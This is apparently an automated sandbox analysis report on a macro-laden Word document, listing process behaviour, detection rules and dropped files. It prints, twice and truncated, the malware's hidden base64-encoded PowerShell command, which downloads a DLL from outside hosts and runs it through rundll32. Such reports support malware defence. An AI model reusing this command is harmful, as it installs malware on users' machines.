Source: VBA code instrumentation	OLE, VBA macro: Module R4bm01nsbtdt1, Function Document_open			Name: Document_open

Source: Doc.doc

OLE indicator, VBA macros: true

Source: Joe Sandbox View

Dropped File: C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll 5E9F4504B7E0938A2B2EB9A7F090BE9F4B1101AA3BE145A3B5895CB14BACD0EF

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: String function: 1000B078 appears 46 times

Source: 00000005.00000002.2093207161.0000000001CB4000.00000004.00000040.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.2093170388.00000000002B6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =

Source: Yvtlx6p4.dll.5.dr

Static PE information: Section: .rsrc ZLIB complexity 0.999343417553

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.evad.winDOC@30/9@1/4

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 17_2_002E6686 CreateToolhelp32Snapshot,

17_2_002E6686

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$Doc.doc

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRC35E.tmp

Jump to behavior

Source: Doc.doc

OLE indicator, Word Document stream: true

Source: Doc.doc	OLE document summary: title field not present or empty
Source: Doc.doc	OLE document summary: edited time not present or 0

Source: C:\Windows\System32\msg.exe	Console Write: ............,........................... .<.......<.....................H...............#...............................h.......5kU.............	Jump to behavior
Source: C:\Windows\System32\msg.exe	Console Write: ............,...................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e...............L.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................................................`I.........v.....................K........~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....................................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j..... ..............................}..v....X.......0.r...............~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................f..j....................................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................f..j......~.............................}..v............0.r.............8.~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#..................j....................................}..v....X.......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#..................j..... ..............................}..v............0.r...............~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....7..................j.....H~.............................}..v....X.......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....7...............&..j....................................}..v............0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....C..................j.....H~.............................}..v....X.......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....C...............&..j....................................}..v............0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....O..................j.....H~.............................}..v....X.......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....O...............&..j....................................}..v............0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v............0.r.............XE~.....(.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....[...............&..j....`...............................}..v............0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.2.2.............}..v............0.r.............XE~.....$.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....g...............&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....s..................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....s...............&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................E..........................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'..................j.....H~.............................}..v....."......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'...............&..j.....#..............................}..v....($......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....3..................j.....H~.............................}..v.....*......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....3...............&..j.....+..............................}..v....(,......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....?..................j.....H~.............................}..v.....2......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....?...............&..j.....3..............................}..v....(4......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....K..................j.....H~.............................}..v.....:......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....K...............&..j.....;..............................}..v....(<......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....W..................j.....H~.............................}..v.....B......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....W...............&..j.....C..............................}..v....(D......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....c..................j.....H~.............................}..v.....J......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....c...............&..j.....K..............................}..v....(L......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....o..................j.....H~.............................}..v.....R......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....o...............&..j.....S..............................}..v....(T......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....{..................j.....H~.............................}..v.....Z......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....{...............&..j.....[..............................}..v....(\......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v.....b......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j.....c..............................}..v....(d......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v.....j......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j.....k..............................}..v....(l......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v.....r......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j.....s..............................}..v....(t......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v.....z......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j.....{..............................}..v....(\|......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v.... .......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#..................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#...............&..j....................................}..v............0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v..../..................j.....H~.............................}..v....P.......0.r.....................r.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v..../...............&..j....................................}..v............0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....;....... ..........j.....H~.............................}..v............0.r.............XE~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....;...............&..j....................................}..v....P.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....E...............................}..v......5.....0.r...............~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....E...............................}..v....0.5.....0.r...............~.............................	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\msg.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1

Source: Doc.doc	Virustotal: Detection: 69%
Source: Doc.doc	ReversingLabs: Detection: 82%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnA
Source: unknown	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAn